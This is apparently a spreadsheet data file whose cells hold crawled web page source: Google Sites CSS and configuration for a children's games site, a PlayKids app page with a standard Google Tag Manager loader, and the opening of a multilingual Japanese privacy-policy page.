    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.fOU46b .KuNac .tCHXDc{color: rgba(33,33,33,1);}}.fOU46b .KuNac</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}.fOU46b .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .zDUgLc{opacity: 1;}.fOU46b .LBrwzc .zDUgLc{border-bottom-style: none;}.YSH9J{color: rgba(255,255,255,1);}.oNsfjf{color: rgba(255,255,255,1);}.wgxiMe{background-color: rgba(0,0,0,1);}.JzO0Vc{background-color: rgba(0,0,0,1);}.M63kCb{background-color: rgba(255,255,255,1);}.zfr3Q{font-family: 'Open Sans'; color: rgba(33,33,33,1); font-size: 11pt; line-height: 1.6; margin-top: 15px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.dhtgD{text-decoration: underline;}.dhtgD:hover{opacity: 0.7;}.dhtgD:active{opacity: 0.7;}.yaqOZd .duRjpb :not(.TYR86d):not(.Ap4VC):first-child{padding-top: 13px;}.yaqOZd .duRjpb :not(.TYR86d):first-of-type{padding-top:</t>
  </si>
  <si>
    <t>13px;}.yaqOZd .duRjpb:not(.TYR86d):last-child{padding-bottom: 13px;}.duRjpb{font-family: 'Playfair Display'; font-size: 34pt; line-height: 1.2; font-weight: 700; color: rgba(0,0,0,1);}.duRjpb:not(.TYR86d){margin-top: 30px; padding-top: 13px; padding-bottom: 13px; border-bottom-color: rgba(240,240,240,1); border-top-color: rgba(240,240,240,1); border-bottom-style: solid; border-top-style: solid; border-bottom-width: 5px; border-top-width: 5px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(0,0,0,1);}.JYVBee{font-family: 'Open Sans'; font-size: 21pt; line-height: 1.25; font-weight: 700; margin-top: 25px; color: rgba(33,33,33,1);}.CobnVe{margin-bottom: -25px;}.aHM7ed{color: rgba(33,33,33,1);}.OmQG5e{font-family: 'Open Sans'; font-size: 15pt; line-height: 1.25; margin-top: 20px; font-weight: 700; color: rgba(0,0,0,1);}.GV3q8e{margin-bottom: -20px;}.NHD4Gf{color: rgba(0,0,0,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(33,33,33,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.TMjjoe{font-family: 'Playfair Display'; font-size: 9pt; line-height: 1.2; margin-top: 0px;}.Zjiec{font-family: 'Playfair Display'; font-weight: 400; font-size: 20pt; line-height: 1.75; margin-top: 48px; margin-left: 48px; margin-bottom: 62px; margin-right: 32px;}.XMyrgf{margin-top: 48px; margin-left: 48px; margin-bottom: 0px; margin-right: 32px;}.PsKE7e{font-family: 'Open Sans'; font-weight: 400; font-size: 12pt;}.IKA38e{border-left-width: 8px; border-left-style: solid; border-left-color: transparent;}.lhZOrc{color: 0.6; border-left-color: rgba(255,255,255,1); font-weight: 700;}.rysYnb .mohMlc{padding-left: 24px;}.Mz8gvb{color: rgba(255,255,255,1);}.LBrwzc .YSH9J{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.LBrwzc .oNsfjf{color: rgba(33,33,33,1);}.LBrwzc .KJll8d{background-color: rgba(33,33,33,1);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .Mz8gvb{color: rgba(33,33,33,1);}.LBrwzc .wgxiMe{background-color: rgba(255,255,255,1);}.LBrwzc .lhZOrc{border-left-color: rgba(0,0,0,1);}.LBrwzc .M9vuGd{border-bottom-color: rgba(0,0,0,1);}.LBrwzc .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.LBrwzc .zDUgLc{border-bottom-color: rgba(204,204,204,1); border-bottom-width: 1px; border-bottom-style: solid;}.GBy4H .oNsfjf{color: rgba(255,255,255,1);}.GBy4H .YSH9J{color: rgba(255,255,255,1);}.GBy4H .Mz8gvb{color: rgba(255,255,255,1);}.GBy4H .wgxiMe{background-color: rgba(0,0,0,1);}.GBy4H .M9vuGd{border-bottom-color: rgba(255,255,255,1);}.GBy4H .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.TlfmSc{font-family: 'Playfair Display'; font-weight: 400; font-size: 15pt; line-height: 1.33;}.jgXgSe{font-family: 'Open Sans'; font-weight: 400; font-size: 12pt; line-height: 28px;}.u5fiyc{line-height: 28px;}.IKA38e{padding-left: 28px; margin-top: 20px;}.hDrhEe{font-family: 'Open Sans'; font-weight: 400;}.iwQgFb{height: 2px; margin-top: 8px; background-color: rgba(0,0,0,0.150000006);}.ySLm4c{font-family: 'Open Sans';}.CbiMKe{background-color: rgba(0,0,0,1);}.QmpIrf{background-color: rgba(0,0,0,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.qeLZfd:before{background-color: rgba(240,240,240,1); display: block;}.qeLZfd .iwQgFb{background-color: rgba(0,0,0,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .duRjpb{border-bottom-color: rgba(255,255,255,1); border-top-color: rgba(255,255,255,1); color: rgba(0,0,0,1);}.qeLZfd .qLrapd{color: rgba(0,0,0,1);}.qeLZfd .JYVBee{color: rgba(33,33,33,1);}.qeLZfd .aHM7ed{color: rgba(33,33,33,1);}.qeLZfd .OmQG5e{color :</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.qeLZfd .NHD4Gf{color: rgba(0,0,0,1);}.qeLZfd .duRjpb .OUGEr{color</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .OmQG5e .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.lQAHbd:before{background-color: rgba(58,58,58,1); display: block;}.lQAHbd .iwQgFb{background-color: rgba(0,0,0,1);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}@media only screen and (max-width: 479px){.lQAHbd .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .QmpIrf{font-size: 11pt;}}.lQAHbd .zfr3Q{color: rgba(255,255,255,1);}.lQAHbd .qnVSj{color: rgba(255,255,255,1);}.lQAHbd .Glwbz{color: rgba(255,255,255,1);}.lQAHbd .duRjpb{color: rgba(255,255,255,1); border-top-color: rgba(48,48,48,1); border-bottom-color: rgba(48,48,48,1);}.lQAHbd .qLrapd{color: rgba(255,255,255,1);}.lQAHbd .JYVBee{color: rgba(255,255,255,1);}.lQAHbd .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .OmQG5e{color: rgba(255,255,255,1);}.lQAHbd .NHD4Gf{color: rgba(255,255,255,1);}.lQAHbd .OUGEr{color: rgba(255,255,255,1);}.LB7kq{padding-bottom: 56px; padding-top: 56px;}@media only screen and (max-width: 479px){.LB7kq{padding-bottom: 28px; padding-top: 28px;}}@media only screen and (min-width: 1280px){.yMcSQd .LB7kq{padding-bottom: 56px; padding-top: 112px;}}@media only screen and (min-width: 1280px){.yMcSQd .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}}.yMcSQd .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.yMcSQd .LBrwzc .tCHXDc{color: rgba(33,33,33,1);}}.yMcSQd .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 1280px){.yMcSQd .GBy4H</t>
  </si>
  <si>
    <t>.tCHXDc{color: rgba(255,255,255,1);}}.yMcSQd .GBy4H .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.yMcSQd .GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}}.KuNac.yMcSQd .GBy4H .iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>1279px){.Ly6Unf .LB7kq{padding-bottom: 56px; padding-top: 112px;}}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .GBy4H .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .GBy4H .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 1279px){.Ly6Unf .LBrwzc .tCHXDc{color: rgba(33,33,33,1);}}.Ly6Unf .LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (max-width: 479px){.Ly6Unf .LB7kq{padding-bottom: 28px; padding-top: 84px;}}@media only screen and (max-width: 479px){.Ly6Unf .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (max-width: 479px){.Ly6Unf .GBy4H .tCHXDc{color: rgba(255,255,255,1);}}.Ly6Unf .GBy4H</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (max-width: 479px){.Ly6Unf .LBrwzc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}}.Ly6Unf .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}@media only screen and (min-width: 480px) and (max-width: 767px){.Ly6Unf .gk8rDe{padding-top: 84px; padding-bottom: 28px;}}@media only screen and (max-width: 479px){.Ly6Unf .gk8rDe{padding-top: 56px; padding-bottom:</t>
  </si>
  <si>
    <t>0px;}}.LB7kq .duRjpb{font-size: 58pt; line-height: 1.06; font-weight: 700; margin-top: 35px; border-bottom-style: none; border-top-style: none;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 37pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 49pt;}}.cJgDec .zfr3Q{color: rgba(255,255,255,1); border-bottom-color: rgba(255,255,255,1); border-top-color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.5; display: block;}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.cJgDec .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.cJgDec .QmpIrf{font-size: 11pt;}}.tpmmCb .zfr3Q{color: rgba(15,15,15,1); border-bottom-color: rgba(15,15,15,1); border-top-color: rgba(15,15,15,1);}.tpmmCb .zfr3Q .OUGEr{color: rgba(15,15,15,1);}.tpmmCb .qnVSj{color: rgba(15,15,15,1);}.tpmmCb .Glwbz{color: rgba(15,15,15,1);}.tpmmCb .qLrapd{color: rgba(15,15,15,1);}.tpmmCb .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(15,15,15,1);}.tpmmCb .NHD4Gf{color: rgba(15,15,15,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(15,15,15,1);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.tpmmCb .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.tpmmCb .QmpIrf{font-size: 11pt;}}.gk8rDe .duRjpb{font-size: 40pt;}.gk8rDe .zfr3Q{color: rgba(15,15,15,1);}.gk8rDe .duRjpb{color: rgba(15,15,15,1);}.gk8rDe .qLrapd{color: rgba(15,15,15,1);}.gk8rDe .OmQG5e{color: rgba(15,15,15,1);}.gk8rDe .NHD4Gf{color: rgba(15,15,15,1);}.gk8rDe .QmpIrf{background-color: rgba(0,0,0,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 27pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 34pt;}}@media only screen and (max-width: 479px){.gk8rDe .QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .QmpIrf{font-size: 11pt;}}.zDUgLc{background-color: rgba(0,0,0,1); opacity: 1;}.qV4dIc{border-bottom-color: rgba(255,255,255,0); border-bottom-style: solid; border-bottom-width: 8px; padding-top: 14px; padding-bottom: 6px; padding-left: 2px; padding-right: 2px; margin-left: 10px; margin-right: 10px;}.M9vuGd{border-bottom-color: rgba(255,255,255,1);}.eWDljc{background-color: rgba(0,0,0,1); padding-bottom: 28px;}.PsKE7e:hover{opacity: 0.6;}.BFDQOb:hover{opacity: 0.6;}.QcmuFb{padding-left: 20px;}.vDPrib{padding-left: 40px;}.TBDXjd{padding-left: 60px;}.bYeK8e{padding-left: 80px;}.CuqSDe{padding-left: 100px;}.Havqpe{padding-left: 120px;}.JvDrRe{padding-left: 140px;}.o5lrIf{padding-left: 160px;}.yOJW7c{padding-left: 180px;}.rB8cye{padding-left: 200px;}.RuayVd{padding-right: 20px;}.YzcKX{padding-right: 40px;}.reTV0b{padding-right: 60px;}.vSYeUc{padding-right: 80px;}.PxtZIe{padding-right: 100px;}.ahQMed{padding-right: 120px;}.rzhcXb{padding-right: 140px;}.PBhj0b{padding-right: 160px;}.TlN46c{padding-right: 180px;}.GEdNnc{padding-right: 200px;}.xkUom{border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(0,0,0,0.1000000015);}.KjwKmc{color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.KjwKmc:hover{background-color: rgba(0,0,0,0.1000000015);}.lQAHbd .xkUom{border</t>
  </si>
  <si>
    <t>-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.lQAHbd .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.lQAHbd .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.lQAHbd .KjwKmc{font-size: 11pt;}}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.cJgDec .xkUom</t>
  </si>
  <si>
    <t>: hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.cJgDec .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.cJgDec .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.cJgDec .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.cJgDec .KjwKmc{font-size: 11pt;}}.tpmmCb .xkUom{border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom: hover{background-color: rgba(0,0,0,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color: rgba(0,0,0,0.1000000015);}@media only screen and (max-width: 479px){.tpmmCb .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.tpmmCb .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.tpmmCb .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.tpmmCb .KjwKmc{font-size: 11pt;}}.gk8rDe .xkUom{border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom:hover{background-color: rgba(0,0,0,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(0,0,0,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc:hover{background-color: rgba(0,0,0,0.1000000015);}@media only screen and (max-width: 479px){.gk8rDe .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.gk8rDe .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .KjwKmc{font-size: 11pt;}}.O13XJf .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.O13XJf .xkUom: hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans'; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}@media only screen and (max-width: 479px){.O13XJf .xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.O13XJf .xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.O13XJf .KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf .KjwKmc{font-size: 11pt;}}.Y4CpGd{font-family: 'Open Sans'; font-size: 11pt;}.CMArNe{background-color: rgba(240,240,240,1);}@media only screen and (max-width: 479px){.duRjpb{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 29pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 17pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 19pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}@media</t>
  </si>
  <si>
    <t>only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.jgXgSe{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.jgXgSe{font-size: 12pt;}}@media only screen and (max-width: 479px){.QmpIrf{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.QmpIrf{font-size: 11pt;}}@media only screen and (max-width: 479px){.xkUom{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.xkUom{font-size: 11pt;}}@media only screen and (max-width: 479px){.KjwKmc{font-size: 11pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.KjwKmc{font-size: 11pt;}}&lt;/style&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL3loGRvJXgsDorozzJpltdkKSZfFi2kHxl2ii8938UuQVTd689HYaNw_0p01RZA1LFIbhXh",1,"CPvCg-24pf4CFenUSgAdk4MCxw",1681340338594165,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747267,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823162,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762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364772220-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[1681340338602,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"f9c234909f6841a3e08f8c81e764c4cfc32ef0e0c912ee9cc43c589df8ce368f","normalizedPath":"view/fun-games-play-kids/privacy-policy","pageTitle":"PRIVACY POLICY"}; function gapiLoaded() {if (globals.gapiLoaded == undefined) {globals.gapiLoaded = true;} else {globals.gapiLoaded();}}window.messages =</t>
  </si>
  <si>
    <t>[]; window.addEventListener &amp;&amp; window.addEventListener('message', function(e) {if (window.messages &amp;&amp; e.data &amp;&amp; e.data.magic == 'SHIC') {window.messages.push(e);}});&lt;/script&gt;&lt;script src="https://apis.google.com/js/client.js?onload=gapiLoaded" nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;&lt;/script&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="HXjrfQMs2P2iiiCRorAQEw"&gt;const</t>
  </si>
  <si>
    <t>imageUrl =  null ;
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload =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data-sitename="fun-games-play-kids" data-universe="1"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t>
  </si>
  <si>
    <t>Illegal excel character</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang =en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;meta name=robots content=noindex&gt;&lt;meta name=googlebot content=noindex&gt;&lt;title&gt;PlayKids&lt;/title&gt;&lt;link rel=manifest href=/manifest.json&gt;&lt;link rel=apple-touch-icon sizes=180x180 href=/img/favicons/apple-touch-icon.png&gt;&lt;link rel=icon type=image/png sizes=32x32 href=/img/favicons/favicon-32x32.png&gt;&lt;link rel=icon type=image/png sizes=16x16 href=/img/favicons/favicon-16x16.png&gt;&lt;link rel=mask-icon href=/img/favicons/safari-pinned-tab.svg color=#111111&gt;&lt;link rel="shortcut icon" href=/img/favicons/favicon.ico&gt;&lt;meta name=msapplication-TileColor content=#111111&gt;&lt;meta name=msapplication-config content=/img/favicons/browserconfig.xml&gt;&lt;meta name=theme-color content=#111111&gt;&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
     new Date().getTime(),event:'gtm.js'});var</t>
  </si>
  <si>
    <t>f=d.getElementsByTagName(s)[0],
     j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-PSPZ6VR');&lt;/script&gt;&lt;link href=/css/app.c2c9ba23.css rel=preload as=style&gt;&lt;link href=/js/app.6ffe729c.js rel=preload as=script&gt;&lt;link href=/js/chunk-vendors.aa0ec1bf.js rel=preload as=script&gt;&lt;link href=/css/app.c2c9ba23.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PSPZ6VR" height=0</t>
  </si>
  <si>
    <t>width=0 style=display:none;visibility:hidden&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but this page doesn't work properly without JavaScript enabled.</t>
  </si>
  <si>
    <t>Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=/js/chunk-vendors.aa0ec1bf.js&gt;&lt;/script&gt;&lt;script src=/js/app.6ffe729c.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="ja"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta charset="UTF-8"&gt;_x005F_x000D_
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;_x005F_x000D_
&lt;meta name="viewport" content="width=device-width"&gt;_x005F_x000D_
&lt;title&gt;プライバシーポリシー&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
 &lt;meta name="format-detection" content="telephone=no"&gt;_x005F_x000D_
_x005F_x000D_
&lt;link rel="stylesheet" href="./css/style.css"&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body id="pagetop" class="article"&gt;_x005F_x000D_
_x005F_x000D_
&lt;! --//////////////contents//////////////--&gt;_x005F_x000D_
&lt;div id="contents"&gt;_x005F_x000D_
  &lt;div id="contentsMain"&gt;_x005F_x000D_
  &lt;nav&gt;_x005F_x000D_
    &lt;ul class="main-nav"&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_en"&gt;English&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;a href="#lang_fr"&gt;Français&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_it"&gt;Italiano&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_de"&gt;Deutsch&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_es"&gt;Español&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_sc"&gt;中文(简体)&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_tc"&gt;中文(繁體)&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_ja"&gt;日本語&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
      &lt;li&gt;&lt;a href="#lang_kr"&gt;한국어&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
    &lt;/ul&gt;_x005F_x000D_
  &lt;/nav&gt;_x005F_x000D_
_x005F_x000D_
		&lt;div class="lang" id="lang_en"&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en"&gt;For users residing outside Asia* &lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#ja"&gt;For users residing in Japan&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#kr"&gt;For users residing in South Korea&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang__item2" href="#en_asia"&gt;For users residing in Asia*  (except Japan and South Korea)&lt;/a&gt;_x005F_x000D_
			&lt;a class="lang_alist" onclick="obj=document.getElementById('en_top_alist').style; obj.display=(obj.display=='none')?'block':'none';"&gt;Asia *&lt;/a&gt;_x005F_x000D_
			 &lt;ul style="clear:both;display:none;" id="en_top_alist" class="top_alist"&gt;_x005F_x000D_
				&lt;li&gt;Republic of India&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Republic of Indonesia&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Republic of Singapore&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Kingdom of Thailand&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Islamic Republic of Pakistan&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Republic of the Philippines&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Brunei Darussalam&lt;/li&gt;_x005F_x000D_
				&lt;li&gt;Socialist Republic of Viet Nam&lt;/li&gt;_x005F_x000D_
